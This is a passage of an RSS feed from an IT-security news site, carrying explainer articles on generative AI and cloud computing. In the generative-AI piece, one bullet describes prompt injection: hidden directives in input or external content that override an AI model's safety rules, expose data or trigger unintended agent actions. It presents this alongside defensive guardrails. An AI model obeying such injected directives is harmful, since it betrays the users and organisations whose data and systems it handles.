<guid isPermaLink="true">https://tsecurity.de/de/3665846/it-security-nachrichten/konferenzen-fuer-software-entwicklung-2026-in-deutschland-informatik-aktuell/</guid>
<pubDate>Mon, 13 Jul 2026 18:23:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security Summit. Ort: Karlsruhe; Termin: 19. März 2026; Schwerpunkt: <b>IT</b>-<b>Sicherheit</b> und Cybersecurity; Kurzbeschreibung: Expertengespräche und ...]]></content:encoded>
</item>
<item>
<title><![CDATA[What is generative AI? How artificial intelligence creates content]]></title>
<description><![CDATA[Generative AI is a kind of artificial intelligence that creates new content, including text, images, audio, and video, based on patterns it has learned from existing data.



Today’s generative models are typically built on foundation-model architectures such as large-language models (LLMs) and m...]]></description>
<link>https://tsecurity.de/de/3665675/ai-nachrichten/what-is-generative-ai-how-artificial-intelligence-creates-content/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665675/ai-nachrichten/what-is-generative-ai-how-artificial-intelligence-creates-content/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:40 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Generative AI is a kind of <a href="https://www.computerworld.com/article/1647870/what-is-artificial-intelligence.html">artificial intelligence</a> that creates new content, including text, images, audio, and video, based on patterns it has learned from existing data.</p>



<p class="wp-block-paragraph">Today’s generative models are typically built on foundation-model architectures such as <a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html">large-language models (LLMs)</a> and multimodal systems, enabling them to carry on conversations, answer questions, write stories, generate code, and produce images or videos from brief prompts.</p>



<p class="wp-block-paragraph"><em>Generative AI</em> is different from <em>discriminative AI</em>, which draws distinctions between different kinds of input. Where discriminative AI answers questions like “Is this image of a rabbit or a lion?”, generative AI instead responds to prompts such as “Describe to me how a rabbit and lion look different from one another” or “Draw me a picture of a lion and a rabbit sitting next to each other” — and in both cases produces text or imagery that, while grounded in the AI’s training data, isn’t just a copy of something that already existed.</p>



<aside class="fakesidebar">
<h4>[ <u><a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html">Read next: Large language models: The foundations of generative AI</a></u> ]</h4>
</aside>




<p class="wp-block-paragraph">Just a few years ago, generative AI was once a novelty focused on chatbots and artistic image generation. Today, it has become a core enterprise technology, and powers everything from content creation and software development to customer support and analytics workflows. But with that power comes a <a href="https://www.csoonline.com/article/4076511/4-factors-creating-bottlenecks-for-enterprise-genai-adoption.html">new set of challenges</a> — from model alignment and hallucination to governance and data-integration hurdles.</p>



<p class="wp-block-paragraph">In this article, we’ll look at how generative AI works, explore how it has evolved into the foundation-model era, examine how to implement it effectively, and offer best practices for getting value out of it, today and in the future.</p>



<h2 class="wp-block-heading"><strong>How does generative AI work?</strong></h2>



<p class="wp-block-paragraph">For decades, early artificial-intelligence efforts often focused on rule-based systems or <a href="https://www.infoworld.com/article/4061121/a-brief-history-of-ai.html">narrowly trained models</a> that were built for one task at a time. While these efforts produced useful systems that could reason and solve human tasks, they were generally a far cry from sci-fi visions of thinking machines. Programs that could talk to people never seemed to get very far past the level of <a href="https://en.wikipedia.org/wiki/ELIZA">ELIZA</a>, a “computer therapist” created at MIT in the mid 1960s; even Siri and Alexa after much fanfare were revealed to be fairly limited.</p>



<p class="wp-block-paragraph">The big structural shift that gave birth to modern generative AI came with the concept of a <em>transformer, </em>first introduced in “<a href="https://arxiv.org/abs/1706.03762">Attention Is All You Need</a>,” a 2017 paper from Google researchers.</p>



<p class="wp-block-paragraph">Using a transformer architecture as a basis, you can build a system that derives meaning from analyzing long sequences of input <em>tokens</em> (words, sub-words, bytes) to understand how different tokens might be related to one another, then determines how likely any given token is to come next in a sequence, given the others. In AI lingo, we call these systems <em>models.</em> Because a model analyzes very large datasets and parameter counts, it can pick up on statistical patterns and knowledge implicitly embedded in the data.</p>



<p class="wp-block-paragraph">This is all easier said than done. The process of adjusting a model’s internal parameters so it gets better at predicting the next token in sequences is called <em>training</em>. During training, the model repeatedly guesses the next token in a given sequence, compares its prediction to the actual one, measures the error, and updates its parameters to reduce that error across billions of examples. Over time, that process teaches the model the statistical relationships that will allow it to generate coherent language (or code, or images) later.</p>



<h2 class="wp-block-heading"><strong>What is a foundation model?</strong></h2>



<p class="wp-block-paragraph">You’ll often hear the word <em>large</em> used for transformer-based models of these types, like the LLMs we mentioned earlier. <em>Large</em> in this context refers to the large number of internal numerical values that the model adjusts during training to represent what it has learned, along with breadth and diversity of data used to train the model and the underlying compute resources powering this whole process.</p>



<p class="wp-block-paragraph">This is in contrast with the narrow models of the earlier era of AI/ML, which werebuilt for one purpose and trained on a limited dataset. For instance, a spam filter may be very good at what it does, but it’s only trained on email data and all it can do is classify emails. Large models, by contrast, serve as what’s known as <em>foundation models</em>. They’re trained broadly on diverse data (text, code, images, or multimodal data) and then adapted or specialized for many downstream tasks.</p>



<p class="wp-block-paragraph">These foundation models are the basis for most of the popular generative AI tools and services on the market today. They can be specialized in several ways:</p>



<ul class="wp-block-list">
<li><strong>Fine-tuning:</strong> Giving a foundation model further training on a smaller, task-specific dataset</li>



<li><strong>Retrieval-augmented generation</strong> <strong>(RAG):</strong> Giving the model the ability to pull in external knowledge when asked a question</li>



<li> <strong>Prompt engineering</strong>: Tailoring a query so the model gives the sort of answers you’re looking for.</li>
</ul>



<h2 class="wp-block-heading"><strong>How do AI systems write computer code?</strong></h2>



<p class="wp-block-paragraph">One of the surprising discoveries of the gen AI era was that in recent years was that foundation models trained on natural-language text can also, when fine-tuned with code examples, also write computer code — often better than many purpose-built systems. Still, it makes sense, when you think about it — after all, high-level computer languages are designed by humans and ultimately based on human language.</p>



<p class="wp-block-paragraph">This <a href="https://www.infoworld.com/article/2338500/llms-and-the-rise-of-the-ai-code-generators.html?utm_source=chatgpt.com">2023 InfoWorld article</a> highlights how models like PaLM, LLaMA and other transformer-based systems fine-tuned on code repositories propelled this shift, but since AI giants like <a href="https://www.computerworld.com/article/3843138/agentic-ai-ongoing-coverage-of-its-impact-on-the-enterprise.html">OpenAI</a> have moved into this space. This all matters because code generation (or code-assisted productivity) has become a key enterprise use case of generative AI — perhaps <em>the </em>key use, given the industry’s enthusiastic adoption of it.</p>



<h2 class="wp-block-heading"><strong>What are AI agents?</strong></h2>



<p class="wp-block-paragraph">So far, we’ve been talking about chatbots, writing assistants, image-generation tools. They respond to prompts, output text or images, and then stop. A new category of tool called <em><a href="https://www.computerworld.com/article/3843138/agentic-ai-ongoing-coverage-of-its-impact-on-the-enterprise.html">agentic AI</a></em> goes further: it <em>plans</em>, <em>executes</em>, and in many cases <em>learns</em> as it works.</p>



<p class="wp-block-paragraph">Because large models already understand language, code, and even structured data to some extent, they can be repurposed to generate not only descriptive text but <em>operational instructions</em>. For example: an agent might parse the intent “generate a sales-report”, then format internal calls like getData(salesDB, region=NA, period=lastQuarter), and then call an API, all by generating text that’s interpreted as instructions. The <a href="https://www.infoworld.com/article/4064169/how-mcp-is-making-ai-agents-actually-do-things-in-the-real-world.html.">MCP framework</a> standardizes the “language” of those instructions and the plug-points into tools and data so that the model doesn’t need bespoke integrations for each new workflow.</p>



<p class="wp-block-paragraph">These kinds of autonomous agents have several enterprise use cases:</p>



<ul class="wp-block-list">
<li><strong>Software automation</strong>: Agents that generate code, call unit tests, deploy builds, monitor logs and even roll back changes autonomously.</li>



<li><strong>Customer support</strong>: Instead of simply drafting responses, agents interact with CRM APIs, update ticket statuses, escalate issues, and trigger follow-up workflows.</li>



<li><strong>IT operations/AIOps</strong>: Agents <a href="https://www.cio.com/article/222623/7-things-to-know-about-ai-in-the-data-center.html">monitor infrastructure, identify anomalies, open/close tickets, or auto-remediate</a> based on defined rules and context from logs.</li>



<li><strong>Security</strong>: Agents may detect threats, initiate alerts, isolate compromised systems, or even attempt to manage threat containment — though this raises new risks.</li>
</ul>



<h2 class="wp-block-heading"><strong>How can you implement generative AI in the enterprise?</strong></h2>



<p class="wp-block-paragraph">We’ve now touched on <em>what</em> generative AI can do. But <em>how</em> can you make it work reliably in your business. The difference between a pilot and full-scale deployment often comes down to systems, structure and governance as much as to models themselves. <em>InfoWorld’</em>s Matt Asay offers a <a href="https://www.infoworld.com/article/4044919/enterprise-essentials-for-generative-ai.html">deep dive into enterprise gen AI essentials</a>, but here are some important points to keep in mind:</p>



<p class="wp-block-paragraph"><strong>Choosing between API, open-source or custom fine-tuned models. </strong>One of the first major decisions for any enterprise project is: do you use a model via an API (e.g., from a vendor like OpenAI or Anthropic), deploy an open-source model internally, or build/fine-tune a custom model yourself? Each has trade-offs.</p>



<p class="wp-block-paragraph">APIs offer speed and minimal setup, but may expose data, limit customization or accrue high cost — and will leave you at the mercy of your vendor. Open source allows internal control and may ease fine-tuning, but requires infrastructure, expertise, and support. Custom fine-tuning gives you the tightest alignment to your use-case, but lengthens time to value and increases risk.</p>



<p class="wp-block-paragraph"><strong>Governance, data privacy and compliance. </strong>Deploying generative AI in an enterprise setting raises new governance, privacy and regulatory issues. For example: Who owns the data that’s ingested? How is proprietary data protected if you call a third-party API? What traceability exists for model outputs—a huge question for regulated industries? One useful framework is covered in “A GRC framework for securing generative AI” Data governance <a href="https://www.infoworld.com/article/2336154/how-data-governance-must-evolve-to-meet-the-generative-ai-challenge.html">must adapt for the new era</a>,  and <a href="https://www.infoworld.com/article/3604732/a-grc-framework-for-securing-generative-ai.html">new frameworks are evolving to help</a>.</p>



<p class="wp-block-paragraph"><strong>Human-in-the-loop review. </strong>Even the best models make mistakes and cannot simply be put on autopilot. You need a <em>human-in-the-loop (HITL)</em> process: real people need to review outputs, validate for bias, approve high-stakes content, and tune prompts or models based on feedback. Incorporating HITL checkpoints helps mitigate risk and improve overall quality.</p>



<p class="wp-block-paragraph"><strong>Integration with existing systems and RAG pipelines. </strong><a href="https://www.infoworld.com/article/2337050/how-rag-completes-the-generative-ai-puzzle.html">Retrieval-augmented generation</a>, which we touched on earlier, connects foundation models into business workflows, systems, and enterprise data stores. RAG can bind LLMs to your organization’s internal knowledge bases, thereby reducing <em>hallucinations </em>(which we’ll discuss in a moment) and increasing the relevance of gen AI output.</p>



<aside class="sidebar">
<h3><strong> Implementation best practices for generative AI</strong></h3>
<p> Here are four AI best practices to keep in mind:</p>
<ol>
<li> Guardrails: Define clear operational boundaries. Examples: restrict sensitive data output, enforce access controls, log model interactions.</li>
<li> Prompt engineering: Because much of what the model will do depends on how it’s prompted, invest in prompt design, versioning, review, and testing.</li>
<li> Evaluation metrics: Define appropriate KPIs (accuracy, latency, cost, business outcome), monitor them and iterate.</li>
<li> Model observability: Treat generative-AI systems like software — monitor performance, detect drift, handle failures gracefully, audit outputs and maintain traceability.</li>
</ol>
</aside>




<h2 class="wp-block-heading"><strong>What causes AI hallucinations?</strong></h2>



<p class="wp-block-paragraph">Probably the biggest limitation of generative AI is what those in the industry call <em>hallucinations</em>, which is a perhaps misleading term for output that is, by the standards of humans who use it, false or incorrect.  </p>



<p class="wp-block-paragraph">Every generative AI system, no matter how advanced, is built around prediction. Remember, a model doesn’t truly <em>know</em> facts—it looks at a series of tokens, then calculates, based on analysis of its underlying training data, what token is most likely to come next. This is what makes the output fluent and human-like, but if its prediction is wrong, that will be perceived as a hallucination.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/10/GenAI_takeaways.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Table describing five key points about generatvie AI" class="wp-image-4082262" width="1024" height="648" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Generative AI, foundation models, agentic AI, governance, and implementation strategy top the list of top generative AI takeaways.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p class="wp-block-paragraph">Because the model doesn’t distinguish between something that’s known to be true and something likely to follow on from the input text it’s been given, hallucinations are a direct side effect of the statistical process that powers generative AI. And don’t forget that we’re often pushing AI models to come up with answers to questions that we, who also have access to that data, can’t answer ourselves.</p>



<p class="wp-block-paragraph">In text models, hallucinations might mean inventing quotes, fabricating references, or misrepresenting a technical process. In code or data analysis, it can produce <a href="https://www.infoworld.com/article/3822251/how-to-keep-ai-hallucinations-out-of-your-code.html">syntactically correct but logically wrong results</a>. Even RAG pipelines, which provide real data context to models, only <em>reduce</em> hallucination—they don’t eliminate it. Enterprises using generative AI need <a href="https://www.cio.com/article/4073606/reducing-llm-hallucinations-in-enterprise-systems.html">review layers, validation pipelines, and human oversight</a> to prevent these failures from spreading into production systems.</p>



<h2 class="wp-block-heading"><strong>What are some other problems with generative AI?</strong></h2>



<p class="wp-block-paragraph">Generative AI has proven to be such a disruptive technology that’s stoking near-apocalyptic fears that it will result in a superintelligence that will enslave or destroy humanity. Meanwhile, in the present day, increasingly troubling reports of so-called <a href="https://www.psychologytoday.com/us/blog/urban-survival/202507/the-emerging-problem-of-ai-psychosis">AI psychosis</a> are emerging, where people have mental health episodes triggered by the uncanny and sometimes sycophantic ways chatbots affirm whatever you talk to them about and try to keep the conversation going.</p>



<p class="wp-block-paragraph">Compared to such existential questions, the following business-related problems may seem petty. But they’re real issues for enterprises considering investing in AI tools.</p>



<ul class="wp-block-list">
<li><strong>Data leakage and regulatory risk. </strong>When a model is fine-tuned or prompted with sensitive information, that data may be memorized and unintentionally reproduced. Using <a href="https://www.csoonline.com/article/3819170/nearly-10-of-employee-gen-ai-prompts-include-sensitive-data.html">third-party APIs without strict controls</a> can expose proprietary or personally identifiable information (PII). Regulatory frameworks like GDPR and HIPAA require explicit governance around where training data resides and how inference results are stored.</li>



<li><strong>Prompt injection </strong>occurs when an attacker manipulates a model’s instructions—embedding hidden directives or malicious payloads in user input or external content the model reads. This can override safety rules, expose internal data, or execute unintended actions in agentic systems. Guardrails that sanitize inputs, restrict tool-calling permissions, and validate outputs are becoming essential.</li>



<li><strong>Copyright and content ownership. </strong>Many foundation models are trained on data scraped from the public internet, creating disputes over copyright and data provenance. Enterprises using generated output commercially need to confirm usage rights and review indemnity terms from vendors.</li>



<li><strong>Unrealistic productivity expectations. </strong>Finally, organizations sometimes expect generative AI to deliver instant productivity gains. The reality, it turns out, is more <a href="https://leaddev.com/velocity/ai-doesnt-make-devs-as-productive-as-they-think-study-finds">mixed</a>. Enterprise adoption requires infrastructure, governance, retraining, and cultural change. The models accelerate work once properly integrated, but they don’t automatically replace human judgment or oversight.</li>
</ul>



<p class="wp-block-paragraph">The current generation of enterprise AI systems includes several layers of defense against these risks:</p>



<ul class="wp-block-list">
<li><em>Guardrails</em> that constrain model behavior and filter unsafe outputs.</li>



<li><em>Model validation</em> frameworks that measure factual accuracy and consistency before deployment.</li>



<li><em>Policy layers</em> that enforce compliance rules, redact sensitive data, and log model actions.</li>
</ul>



<p class="wp-block-paragraph">These safeguards reduce—but don’t remove—the inherent uncertainty that defines generative AI.</p>



<h2 class="wp-block-heading"><strong>GenAI: essential for the enterprise</strong></h2>



<p class="wp-block-paragraph">Generative AI has evolved from a novelty into a core layer of enterprise technology. Foundation models and agentic systems now power automation, analytics, and creative workflows — but they remain fundamentally probabilistic tools. Their strength lies in scale and adaptability, not perfect understanding.</p>



<p class="wp-block-paragraph">For organizations, success depends less on chasing model breakthroughs than on integrating these systems responsibly: building guardrails, maintaining oversight, and aligning them with real business needs. Used wisely, generative AI can amplify human capability rather than replace it.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is cloud computing? From infrastructure to autonomous, agentic-driven ecosystems]]></title>
<description><![CDATA[Cloud computing continues to be the platform of choice for large applications and a driver of innovation in enterprise technology. Gartner forecasts public cloud spending alone to  the public cloud services market alone will reach $1.42 trillion in current U.S. dollars, driven by AI workloads and...]]></description>
<link>https://tsecurity.de/de/3665669/ai-nachrichten/what-is-cloud-computing-from-infrastructure-to-autonomous-agentic-driven-ecosystems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665669/ai-nachrichten/what-is-cloud-computing-from-infrastructure-to-autonomous-agentic-driven-ecosystems/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:32 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h3 class="wp-block-heading"></h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2337750/when-will-cloud-computing-stop-growing.html">Cloud computing</a> continues to be the <a href="https://www.cio.com/article/482179/volkswagen-drives-the-automotive-industry-cloud-forward.html">platform of choice for large applications</a> and a <a href="https://www.infoworld.com/article/2336917/cloud-computing-is-reinventing-cars-and-trucks.html">driver of innovation</a> in enterprise technology. <a href="https://www.gartner.com/en/newsroom/press-releases/2024-05-20-gartner-forecasts-worldwide-public-cloud-end-user-spending-to-surpass-675-billion-in-2024#:~:text=Worldwide%20end-user%20spending%20on,(GenAI)%20and%20application%20modernization.">Gartner </a>forecasts public cloud spending alone to  the<a href="https://www.gartner.com/en/documents/6302015#:~:text=Summary,AI%20workloads%20and%20enterprise%20modernization."> public cloud services market alone </a>will reach $1.42 trillion in current U.S. dollars, driven by AI workloads and enterprise modernization.</p>



<p class="wp-block-paragraph">Driving this growth are the rise of <a href="https://www.infoworld.com/article/2262333/youre-doing-cloud-based-ai-and-machine-learning-wrong.html">AI and machine learning on the cloud</a>, <a href="https://www.infoworld.com/article/2335144/what-happened-to-edge-computing.html">adoption of edge computing</a>, the maturation of <a href="https://www.infoworld.com/article/3406501/what-is-serverless-serverless-computing-explained.html">serverless computing</a>, the emergence of <a href="https://www.infoworld.com/article/3584433/are-you-ready-for-multicloud-a-checklist.html">multicloud strategies</a>, improved security and privacy, and more sustainable cloud practices.</p>



<h2 class="wp-block-heading">What is cloud computing?</h2>



<p class="wp-block-paragraph">While often used broadly, the term cloud computing is defined as an abstraction of compute, storage, and network infrastructure assembled as a platform on which applications and systems are deployed quickly and scaled on the fly.</p>



<p class="wp-block-paragraph">Most cloud customers consume <a href="https://www.cio.com/article/2097657/6-cloud-market-forces-impacting-it-strategies-today.html">public cloud </a>computing services over the internet, which are hosted in large, remote data centers maintained by cloud providers. The most common type of cloud computing, SaaS (software as service), delivers prebuilt applications to the browsers of customers who pay per seat or by usage, exemplified by such popular apps as Salesforce, Google Docs, or Microsoft Teams.</p>



<h3><strong> 5 top trends in cloud computing</strong></h3>

<ol>
<li><strong>Agentic cloud ecosystems: </strong> The shift from AI as a tool to AI as an autonomous operator within cloud environments.</li>
<li><strong>Sovereign and localized clouds: </strong> Meeting strict national data residency and digital sovereignty laws.</li>
<li><strong>Specialized AI hardware access: </strong> Navigating the GPU capacity crunch through reserved instances and boutique AI clouds.</li>
<li><strong>Integrated greenOps: </strong>Merging cost optimization with mandatory carbon-footprint reporting.</li>
<li><strong>Industry-specific walled gardens: </strong> The maturation of vertical clouds into highly regulated, precompliant environments for finance and healthcare.</li>
</ol>






<p class="wp-block-paragraph">Next in line is IaaS (infrastructure as a service), which offers vast, virtualized compute, storage, and network infrastructure upon which customers build their own applications, often with the aid of providers’ <a href="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html">API</a>-accessible services.</p>



<p class="wp-block-paragraph">When people refer to the “the cloud” today, they most often mean the big IaaS providers: AWS (Amazon Web Services), Google Cloud Platform, or Microsoft Azure. All three have become ecosystems of services that go way beyond infrastructure and include developer tools, serverless computing, machine learning services and APIs, data warehouses, and thousands of other services. With both SaaS and IaaS, a key benefit is agility. Customers gain new capabilities almost instantly without the capital investment in hardware or software on-premises — and they can instantly scale the cloud resources they consume up or down as needed.</p>



<p class="wp-block-paragraph">According to <a href="https://foundryco.com/research/cloud-computing/">Foundry’s Cloud Computing Study, 2025</a>, enterprises are moving to the cloud to improve security and/or governance, increase scalability​, accelerate adoption of artificial intelligence and machine learning and other new technologies, replace on-premises legacy technology, ​improve employee productivity, and ensure disaster recovery and business continuity.</p>



<h2 class="wp-block-heading">Hyperscalers now dominate cloud services</h2>



<p class="wp-block-paragraph">The largest cloud service providers are often described as hyperscalers, due to their capability to provide large-scale data centers across the globe. Hyperscalers typically offer a wide range of cloud services, including IaaS, PaaS, SaaS, and more.</p>



<p class="wp-block-paragraph">As mentioned above, notable hyperscalers include Amazon Web Services (AWS), Google Cloud Platform, and Microsoft Azure. They offer the following capabilities.</p>



<ul class="wp-block-list">
<li><strong>Scalability</strong>: Hyperscalers can handle massive workloads and scale resources up or down quickly.</li>



<li><strong>Cost-effectiveness</strong>: Hyperscalers often offer competitive pricing and economies of scale.</li>



<li><strong>Global reach</strong>: Hyperscalers operate data centers around the world, providing low-latency access to customers in different regions.</li>



<li><strong>Innovation</strong>: Hyperscalers are at the forefront of cloud innovation, offering new services and features.</li>
</ul>



<h3 class="wp-block-heading">Challenges of working with hyperscalers</h3>



<ul class="wp-block-list">
<li><strong>Vendor lock-in</strong>: Relying heavily on a single hyperscaler can create <a href="https://www.cio.com/article/648048/hyperscalers-in-crosshairs-for-anti-competitive-pricing-and-lock-in.html">vendor lock-in</a>, making it difficult to switch to another provider and charging large egress fees if you do move.</li>



<li><strong>Complexity</strong>: Hyperscalers offer a vast array of services, which can be overwhelming for some customers.</li>



<li><strong>Security concerns</strong>: Because hyperscalers handle sensitive data, security is a major concern.</li>
</ul>



<h2 class="wp-block-heading"><strong>AI, Agents, and the Sovereign Cloud</strong></h2>



<p class="wp-block-paragraph">The AI-enabled enterprise has moved beyond simple chatbots. The focus has shifted to <strong>agentic workflows </strong>— autonomous systems that reside in the cloud and possess the authority to execute business processes, manage cloud spend, and self-patch security vulnerabilities without human intervention.</p>



<h3 class="wp-block-heading"><strong>The shift to agentic infrastructure</strong></h3>



<p class="wp-block-paragraph">Cloud providers are no longer just selling compute. They are selling <strong>inference-as-a-service</strong>. Modern cloud budgets are now dominated by the high cost of specialized GPU clusters (such as Nvidia’s Blackwell architecture). This has led to the rise of boutique AI clouds that compete with hyperscalers by offering bare-metal access to the latest silicon specifically for model training and fine-tuning.</p>



<h3 class="wp-block-heading"><strong>Data sovereignty and private AI</strong></h3>



<p class="wp-block-paragraph">A major shift in late 2025 is the move away from public AI models for sensitive data. Organizations are increasingly using retrieval-augmented generation (RAG) within walled garden environments. This ensures that a company’s proprietary data never leaves their specific cloud instance to train a provider’s base model.</p>



<p class="wp-block-paragraph">Furthermore, sovereign AI has become a requirement for global operations. Governments now demand that the AI models processing their citizens’ data be hosted on infrastructure that is owned, operated, and governed within their own borders.</p>



<h3 class="wp-block-heading"><strong>The challenges of ghost AI</strong></h3>



<p class="wp-block-paragraph">Just as shadow IT plagued the 2010s, ghost AI—unauthorized AI agents running on corporate cloud accounts — has become a primary security risk. Managing these autonomous entities requires a new layer of <strong>AI governance</strong>, where the cloud provider automatically audits the intent and permissions of every running agent to prevent runaway costs or data leaks.</p>



<h2 class="wp-block-heading">Cloud computing definitions</h2>



<p class="wp-block-paragraph">In 2011, <a href="https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-145.pdf">NIST posted a PDF</a> that divided cloud computing into three “service models” — SaaS, IaaS, and PaaS (platform as a service) — the latter being a controlled environment within which customers develop and run applications. These three categories have largely stood the test of time, although most PaaS solutions now are made available as services within IaaS ecosystems rather than as dedicated PaaS clouds.</p>



<p class="wp-block-paragraph">Two evolutionary trends stand out since NIST’s threefold definition. One is the long and growing list of subcategories within SaaS, IaaS, and PaaS, some of which blur the lines between categories. The other is the explosion of API-accessible services available in the cloud, particularly within IaaS ecosystems. The cloud has become a crucible of innovation where many emerging technologies appear first as services, a big attraction for business customers who understand the potential competitive advantages of early adoption.</p>



<h3 class="wp-block-heading"><strong>SaaS (software as a service) definition</strong></h3>



<p class="wp-block-paragraph">This type of cloud computing delivers applications over the internet, typically with a browser-based user interface. Today, most software companies offer their wares via <a href="https://www.infoworld.com/article/2256637/what-is-saas-software-as-a-service-defined.html">SaaS </a>— if not exclusively, then at least as an option.</p>



<p class="wp-block-paragraph">The most popular SaaS applications for business are <a href="https://www.computerworld.com/article/3570821/google-workspace-explained-googles-answer-to-microsoft-365.html">Google’s G Suite</a> and <a href="https://www.computerworld.com/article/1710782/office-2021-vs-microsoft-365-office-365-how-to-choose.html">Microsoft’s Office 365</a>. Most enterprise applications, including giant <a href="https://www.cio.com/article/272362/what-is-erp-key-features-of-top-enterprise-resource-planning-systems.html">ERP</a> suites from Oracle and SAP, come in both SaaS and on-premises versions. SaaS applications typically offer extensive configuration options as well as development environments that enable customers to code their own modifications and additions. They also enable data integration with on-prem applications.</p>



<h3 class="wp-block-heading"><strong>IaaS (infrastructure as a service) definition</strong></h3>



<p class="wp-block-paragraph">At a basic level, <a href="https://www.infoworld.com/article/2255598/what-is-iaas-your-data-center-in-the-cloud.html">IaaS </a>cloud providers offer virtualized compute, storage, and networking over the internet on a pay-per-use basis. Think of it as a data center maintained by someone else, remotely, but with a software layer that virtualizes all those resources and automates customers’ ability to allocate them with little trouble.</p>



<p class="wp-block-paragraph">But that’s just the basics. The full array of services offered by the major public IaaS providers is staggering: <a href="https://www.infoworld.com/article/2269279/the-era-of-the-cloud-database-has-finally-begun.html">highly scalable databases</a>, virtual private networks, <a href="https://www.infoworld.com/article/2255434/what-is-big-data-analytics-fast-answers-from-diverse-data-sets.html">big data analytics</a>, <a href="https://www.infoworld.com/article/2259367/buyers-guide-how-to-choose-a-cloud-machine-learning-platform.html">AI and machine learning services</a>, application platforms, developer tools, <a href="https://www.infoworld.com/article/3215275/what-is-devops-transforming-software-development.html">devops</a> tools, and so on. Amazon Web Services was the first IaaS provider and remains the leader, followed by <a href="https://www.infoworld.com/article/2269424/azure-cloud-services-guide-the-right-tools-for-the-job.html">Microsoft Azure</a>, <a href="https://www.infoworld.com/article/2263677/google-cloud-platform-services-guide-the-right-tools-for-the-job.html">Google Cloud Platform</a>, <a href="https://www.infoworld.com/article/2256709/ibm-cloud-services-guide-the-right-tools-for-the-job.html">IBM Cloud</a>, and <a href="https://www.infoworld.com/article/3529339/oracle-cloudworld-2024-10-key-takeaways-from-the-big-annual-event.html">Oracle Cloud</a>.</p>



<h3 class="wp-block-heading"><strong>PaaS (platform as a service) definition</strong></h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2256066/what-is-paas-platform-as-a-service-a-simpler-way-to-build-software-applications.html">PaaS</a> provides sets of services and workflows that specifically target developers, who can use shared tools, processes, and APIs to accelerate the development, testing, and deployment of applications. Salesforce’s <a href="https://www.infoworld.com/article/2257217/5-foolish-reasons-youre-not-using-heroku.html">Heroku</a> and Salesforce Platform (formerly Force.com) are popular public cloud PaaS offerings; <a href="https://www.infoworld.com/article/2258957/cloud-foundry-stages-a-comeback.html">Cloud Foundry</a> and Red Hat’s <a href="https://www.infoworld.com/article/2261552/red-hat-openshift-adds-containers-and-microservices-features-for-developers.html">OpenShift</a> can be deployed on premises or accessed through the major public clouds. For enterprises, PaaS can ensure that developers have ready access to resources, follow certain processes, and use only a specific array of services, while operators maintain the underlying infrastructure.</p>



<h3 class="wp-block-heading"><strong>FaaS (function as a service) definition</strong></h3>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2256402/paas-caas-or-faas-how-to-choose.html">FaaS</a>, the original and most basic version of <a href="https://www.infoworld.com/article/2266283/serverless-in-the-cloud-aws-vs-google-cloud-vs-microsoft-azure.html">serverless computing</a>, adds another layer of abstraction to PaaS, so that developers are insulated from everything in the stack below their code. Instead of futzing with virtual servers, containers, and application runtimes, developers upload narrowly functional blocks of code, and set them to be triggered by a certain event (such as a form submission or uploaded file). All of the major clouds offer FaaS on top of IaaS: <a href="https://www.infoworld.com/article/2265897/aws-lambda-tutorial-get-started-with-serverless-computing-2.html">AWS Lambda</a>, <a href="https://www.infoworld.com/article/2255377/how-to-work-with-azure-functions-in-csharp.html">Azure Functions</a>, <a href="https://www.infoworld.com/article/2243861/google-takes-aims-at-aws-lambda-with-cloud-functions.html">Google Cloud Functions</a>, and IBM Cloud Functions. A special benefit of FaaS applications is that they consume no IaaS resources until an event occurs, reducing pay-per-use fees.</p>



<h3 class="wp-block-heading"><strong>Private cloud definition</strong></h3>



<p class="wp-block-paragraph">A <a href="https://www.infoworld.com/article/2179737/build-your-own-private-cloud-2.html">private cloud</a> downsizes the technologies used to run IaaS public clouds into software that can be deployed and operated in a customer’s data center. As with a public cloud, internal customers can provision their own virtual resources to build, test, and run applications, with metering to charge back departments for resource consumption. For administrators, the private cloud amounts to the ultimate in data center automation, minimizing manual provisioning and management.</p>



<p class="wp-block-paragraph">VMware remains a force in the private cloud software market, but the acquisition by Broadcom has created confusion and raised concerns among some customers about potential changes in pricing, licensing, and support. This could lead some organizations to explore alternative solutions.</p>



<p class="wp-block-paragraph">OpenStack continues to be a popular open-source choice for building private clouds. It offers a flexible and customizable platform that can be tailored to specific needs. However, OpenStack can be complex to deploy and manage, and it may require significant expertise to maintain.</p>



